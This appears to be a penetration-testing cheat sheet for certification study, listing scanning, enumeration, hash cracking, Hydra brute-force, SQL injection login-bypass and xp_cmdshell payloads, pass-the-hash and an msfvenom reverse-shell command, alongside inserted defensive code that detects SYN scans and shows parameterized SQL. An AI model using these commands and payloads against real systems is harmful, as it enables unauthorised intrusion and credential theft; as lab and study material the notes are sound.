gabrielss4ntos/pentest-notes

pentest-tricks

Enumeration

  • ping URL -f -l 1500 -> Frame size
  • tracert URL -> Determining hop count

Using Metasploit

  • msfdb init
  • service postgresql start
  • msfconsole
  • msf > db_status
  • nmap -Pn -sS -A -oX Test 10.10.10.0/24
  • db_import Test
  • hosts -> To show all available hosts in the subnet
  • db_nmap -sS -A 10.10.10.16 -> To extract services of particular machine
  • services -> to get all available services in a subnet

SMB Version Enumeration using MSF

  • use scanner/smb/smb_version
  • set RHOSTS 10.x.x.x-X
  • set THREADS 100
  • run
  • hosts -> now exact os_flavor information has been updated

SMB Commands

  • nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse MACHINE_IP
  • smbclient ///anonymous
  • smbget -R smb:///anonymous

Scanning Networks

  • Hping3

    1. Port scanning using hping3: hping3 --scan 1-3000 -S 10.10.10.10 (--scan defines the port range to scan and -S sets the SYN flag).

    2. Pinging the target using hping3: hping3 -c 3 10.10.10.10 (-c 3 means only three packets are sent to the target machine).

    3. UDP packet crafting: hping3 10.10.10.10 --udp --rand-source --data 500

    4. TCP SYN request: hping3 -S 10.10.10.10 -p 80 -c 5
       (-S sends TCP SYN packets to the target machine, -p selects the destination port, and -c is the number of packets sent to the target.)

    5. hping3 flood: hping3 10.10.10.10 --flood

  • Nmap

    • Scan a subnet - nmap 20.0.20.0/24
    • Scan targets from a text file - nmap -iL list-of-ips.txt
    • Scan a single port - nmap -p 22 20.0.20.1
    • Scan a range of ports - nmap -p 1-100 20.0.20.1
    • Scan 100 most common ports (fast) - nmap -F 20.0.20.1
    • Scan all 65535 ports - nmap -p- 20.0.20.1
    • Scan using TCP connect - nmap -sT 20.0.20.1
    • Scan using TCP SYN scan (default) - nmap -sS 20.0.20.1
    • Scan UDP ports - nmap -sU -p 123,161,162 20.0.20.1
    • Scan selected ports, ignore discovery - nmap -Pn -F 20.0.20.1
    • Detect OS and services - nmap -A 20.0.20.1
    • Standard service detection - nmap -sV 20.0.20.1
    • nmap -O
    • nmap --packet-trace
    • nmap -sT -T3 -A
    • nmap -sA -v -T4
    • nmap -sP, nmap -D RND
    • nmap --mtu 8
    • nmap -v -sS -T5
    • nmap -sV -Pn
    • nmap -sP
    • nmap -sA
    • nmap -sV -A -F
    • nmap -sS
    • nmap -p- --max-rtt-timeout 50ms, nmap -v -sS -f -T5
  • Netdiscover

    • netdiscover -i eth0
    • netdiscover -i eth0 -r

Enumeration

SNMP Enumeration

  • nmap -sU -p 161 192.168.0.X
  • nmap -sU -p 161 --script=snmp-brute 192.168.0.X
  • msfconsole
  • use auxiliary/scanner/snmp/snmp_login
  • set RHOSTS and exploit
  • use auxiliary/scanner/snmp/snmp_enum
  • set RHOSTS and exploit

NetBIOS Enumeration

  • nbtstat -A 192.168.0.X
  • net use
  • net use \\192.168.0.X\e "" /user:""
  • NetBIOS Enumerator

Enum4Linux / WINS Enumeration:

  • enum4linux -u user -p password -U 10.x.x.x -> user enumeration
  • enum4linux -u user -p password -o 10.x.x.x -> OS enumeration
  • enum4linux -u user -p password -P 10.x.x.x -> password policy information
  • enum4linux -u user -p password -G 10.x.x.x -> group information
  • enum4linux -u user -p password -S 10.x.x.x -> share policy information (SMB share enumeration)

Active Directory LDAP Enumeration: ADExplorer

Vulnerability Analysis

  • nikto -h http://target -Tuning 1

  • Nessus runs on https://localhost:8834

    Username: admin
    Password: password
    
  • Nessus -> Policies > Advanced scan

  • Discovery > Host Discovery > Turn off Ping the remote host

  • Port Scanning > check the Verify open TCP ports found by local port enumerators

  • Advanced

    Max number of TCP sessions per host = unlimited
    Max number of TCP sessions per scan = unlimited
    
  • Credentials > Windows > Username & Password

  • Save policy > Create new scan > User Defined

  • Enter name & Target

  • Schedule tab > Turn off Enabled

  • Hit Launch from the Save drop-down.

Web Fuzzing

  • wfuzz: wfuzz -c -z file,common.txt --hc 404 http://site.com.br/FUZZ

  • gobuster: gobuster dir -u IP_ADDRESS -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html

System Hacking

NTLM Hash crack

  • responder -I eth0
  • /usr/share/responder/logs --> Responder log location
  • john /usr/share/responder/logs/ntlm.txt

Rainbow table crack using Winrtgen

  • Open winrtgen and add new table
  • Select ntlm from Hash dropdown list.
  • Set Min Len as 4, Max Len as 6 and Chain Count 4000000
  • Select loweralpha from Charset dropdown list (it depends upon Password).
  • rcrack_gui.exe to crack hash with rainbow table

Hash dump with Pwdump7 and crack with ophcrack

  • wmic useraccount get name,sid --> Get user account names and SIDs
  • PwDump7.exe > c:\hashes.txt
  • Replace boxes in hashes.txt with relevant usernames from step 1.
  • Ophcrack.exe -> load -> PWDUMP File
  • Tables -> Vista free -> select the table directory -> crack

Sniffing

  • Wireshark Filters

  • Filter HTTP traffic: http.request.method == "POST", http.request.uri matches "pattern"

  • Filter TCP traffic: tcp.port eq 25 or icmp, tcp.window_size == 0 && tcp.flags.reset != 1

  • ip.addr matches against both the source and the destination address in the IP header; the same is true for tcp.port, udp.port, eth.addr and others. http.request.method == "POST" -> Wireshark filter for HTTP POST requests.

Show only traffic between source and destination

  • ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
  • ip.src==10.20.20.5 and ip.dst==201.22.7.102

Filter (Contains)

  • http.request.uri matches "gl=se$" - Note: the $ character is a PCRE punctuation character that matches the end of a string.
  • http.request.uri contains admin
  • tcp contains admin
  • udp contains 81:60:03
  • sip.To contains "a1762"

Filter TTL - ip.ttl == 64

  • TCPDump

  • tcpdump -v -i eth0 -w nome.pcap

  • tcpdump -v -i eth0 icmp -w icmp.pcap

Show only traffic between source and destination

  • tcpdump -vnr file.pcap host 192.168.0.X
  • tcpdump -vnr file.pcap src host 192.168.0.X
  • tcpdump -vnr file.pcap dst host 192.168.0.X
  • tcpdump -vnr file.pcap src host 192.168.0.1 and dst host 192.168.0.2

Filter Ports

  • tcpdump -vnr file.pcap port 80

Show details protocol ethernet

  • tcpdump -er file.pcap

Filter Protocol

  • tcpdump -vnr file.pcap udp

Filter strings

  • tcpdump -vnr file.pcap | grep "PASS"

== TCPDump flags ==

  • [S] - SYN
  • [S.] - SYN, ACK
  • [.] - ACK
  • [P.] - PSH, ACK
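The flag notation above is what a defender reads when reviewing a capture for the hping3 and nmap SYN scans listed earlier in these notes. As an added example (not from the original notes or from tcpdump), the script below parses tcpdump's default text output with a regular expression, expands the flag characters to their names, and applies a simple detection heuristic: a source that sends bare SYNs to many distinct destination ports and never completes a handshake with the final ACK. The packet lines are constructed samples in tcpdump's `-n` output format; `find_syn_scanners` and its threshold are hypothetical choices.

```python
"""Parse tcpdump text output and flag likely TCP SYN scans.

Added example, not part of the original notes. The packet lines are constructed
samples in tcpdump's default (-n) line format.
"""
import re
from collections import defaultdict

# tcpdump -n line: "HH:MM:SS.ffffff IP src.sport > dst.dport: Flags [S], seq ..., length 0"
TCPDUMP_LINE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

# tcpdump's single-character TCP flag notation.
FLAG_NAMES = {"S": "SYN", ".": "ACK", "P": "PSH", "F": "FIN",
              "R": "RST", "U": "URG", "E": "ECE", "W": "CWR"}


def decode_flags(flag_str):
    """Expand tcpdump flag characters, e.g. 'S.' -> ['SYN', 'ACK']."""
    return [FLAG_NAMES[c] for c in flag_str if c in FLAG_NAMES]


def parse_line(line):
    """Return a dict for a TCP line, or None for lines in another format (ICMP, ARP, ...)."""
    m = TCPDUMP_LINE.match(line)
    if m is None:
        return None
    pkt = m.groupdict()
    pkt["sport"] = int(pkt["sport"])
    pkt["dport"] = int(pkt["dport"])
    pkt["flags"] = decode_flags(pkt["flags"])
    return pkt


def find_syn_scanners(lines, min_ports=10):
    """Map source IP -> number of distinct (dst, port) pairs it sent a bare SYN to and never ACKed.

    A normal client sends SYN, receives SYN/ACK and replies with ACK; that ACK removes the
    target from the client's unanswered set. A SYN scanner never sends the final ACK, so its
    set keeps growing with every port probed.
    """
    unanswered = defaultdict(set)
    for line in lines:
        pkt = parse_line(line)
        if pkt is None:
            continue
        key = (pkt["dst"], pkt["dport"])
        if pkt["flags"] == ["SYN"]:
            unanswered[pkt["src"]].add(key)
        elif pkt["flags"] == ["ACK"] and key in unanswered.get(pkt["src"], set()):
            unanswered[pkt["src"]].discard(key)  # handshake completed
    return {src: len(t) for src, t in unanswered.items() if len(t) >= min_ports}


# Constructed sample capture: one legitimate HTTPS handshake from .20, one ICMP line,
# and .50 probing twelve ports on .10 (the server answers each probe with RST/ACK).
SAMPLE_LINES = [
    "10:00:00.000100 IP 192.168.0.20.51000 > 192.168.0.10.443: Flags [S], seq 100, win 64240, length 0",
    "10:00:00.000200 IP 192.168.0.10.443 > 192.168.0.20.51000: Flags [S.], seq 500, ack 101, win 65160, length 0",
    "10:00:00.000300 IP 192.168.0.20.51000 > 192.168.0.10.443: Flags [.], ack 501, win 502, length 0",
    "10:00:00.000400 IP 192.168.0.20.51000 > 192.168.0.10.443: Flags [P.], seq 101:300, ack 501, win 502, length 199",
    "10:00:01.000000 IP 192.168.0.20 > 192.168.0.10: ICMP echo request, id 1, seq 1, length 64",
]
for _port in range(20, 32):
    SAMPLE_LINES.append(
        f"10:00:02.{_port:06d} IP 192.168.0.50.40001 > 192.168.0.10.{_port}: Flags [S], seq 1, win 1024, length 0")
    SAMPLE_LINES.append(
        f"10:00:02.{_port + 1:06d} IP 192.168.0.10.{_port} > 192.168.0.50.40001: Flags [R.], seq 0, ack 2, win 0, length 0")


if __name__ == "__main__":
    for src, count in find_syn_scanners(SAMPLE_LINES).items():
        print(f"possible SYN scan from {src}: {count} unanswered ports")
```

On a real capture, pipe `tcpdump -nr file.pcap tcp` into the parser line by line. The heuristic deliberately ignores `[S.]` and `[R.]` replies from the server, so a busy server is never flagged for answering; only the side that originates the SYNs is counted.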

Hacking Web Servers

  • FTP Bruteforce with Hydra
    • hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://IP

Hacking Web Applications

Wordpress - wpscan --url http://IP --enumerate u

Wordpress password bruteforce

msfconsole - use auxiliary/scanner/http/wordpress_login_enum

RCE - ping 127.0.0.1 | hostname | net user

SQL Injection

  • SQL queries
    • ' or 1=1 --
  • MySQL, MSSQL, Oracle, PostgreSQL, SQLite
    • ' OR '1'='1' --
    • ' OR '1'='1' /*
  • MySQL
    • ' OR '1'='1' #
  • Access (using null characters)
    • ' OR '1'='1' %00
    • ' OR '1'='1' %16

Using sqlmap

Others

  • Login bypass
    • blah' or 1=1 --
  • Insert data into DB from login
    • blah';insert into login values ('john','apple123');
  • Create database from login
    • blah';create database mydatabase;
  • Execute cmd from login
    • blah';exec master..xp_cmdshell 'ping www.target -l 65000 -t'; --
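The login-bypass strings in the two lists above only work because the application pastes the input into the SQL text. As an added example (not from the original notes), the code below puts a string-concatenated login check next to a parameterized one and runs the same payloads through both against an in-memory SQLite table named `login`, constructed to match the `insert into login values (...)` line above. The `login_vulnerable`, `login_safe` and `compare` functions are hypothetical.

```python
"""Why the login-bypass payloads work, and the fix: string-built SQL vs. parameterized SQL.

Added example, not part of the original notes. Uses a constructed in-memory
SQLite table so it runs offline.
"""
import sqlite3


def make_db():
    """Constructed sample database with one valid account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO login VALUES ('john', 'apple123')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates user input into the statement, so the input becomes SQL syntax."""
    sql = ("SELECT username FROM login WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Binds user input as parameters, so the input is only ever compared as a value."""
    sql = "SELECT username FROM login WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def compare(payload_user, payload_pass="anything"):
    """Run the same credentials through both checks; returns (vulnerable_result, safe_result)."""
    conn = make_db()
    try:
        return (login_vulnerable(conn, payload_user, payload_pass),
                login_safe(conn, payload_user, payload_pass))
    finally:
        conn.close()


if __name__ == "__main__":
    for user in ["john", "blah' or 1=1 --", "' OR '1'='1' --"]:
        print(repr(user), "->", compare(user, "apple123" if user == "john" else "anything"))
```

With the bypass strings the concatenated query becomes `... WHERE username = 'blah' or 1=1 --' AND password = ...`: the `or 1=1` makes the condition always true and `--` comments out the password check, so `login_vulnerable` returns True while `login_safe` returns False. The stacked-query payloads (`blah';insert into ...`, `blah';exec master..xp_cmdshell ...`) additionally depend on the driver accepting several statements in one call; Python's `sqlite3.execute()` refuses that, which is helpful defense in depth but not a substitute for parameter binding.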

Brute Force

  • Hydra

    • hydra -L ../../User.txt -P ../../../Pass.txt ftp://< target of evaluation >
    • hydra -L ../../User.txt -P ../../../Pass.txt ssh://< target of evaluation >
    • hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form "/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" -vV -f
    • hydra -l admin -P /usr/share/wordlists/test.txt 192.168.80.134 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login" -vV -f
    • hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://10.10.10.11
    • hydra -l roger -P lists/pass.txt 192.168.56.117 -V http-post-form "/imfadministrator/:user=^USER^&pass=^PASS^:F=Invalid username."

  • John

  • PassTheHash

pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.167.10 cmd

Create login: blah';insert into login values ('john','apple123'); --

.\SNOW.EXE -C -m "A conta do meu banco é 45656684512263" -p "magic" .\secrete_encrypt2.txt

.\SNOW.EXE -C -p "magic" .\secrete_encrypt.txt

snow -C -p "magic" readme2.txt

snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw

"dir flag* /s /p"

NTFS data stream: create a file cehv11.txt with text in a hidden stream: echo "novo texto" > cehv11.txt:stream1

Recover it: more < cehv11.txt:stream1

Discover NTFS data streams: dir /r
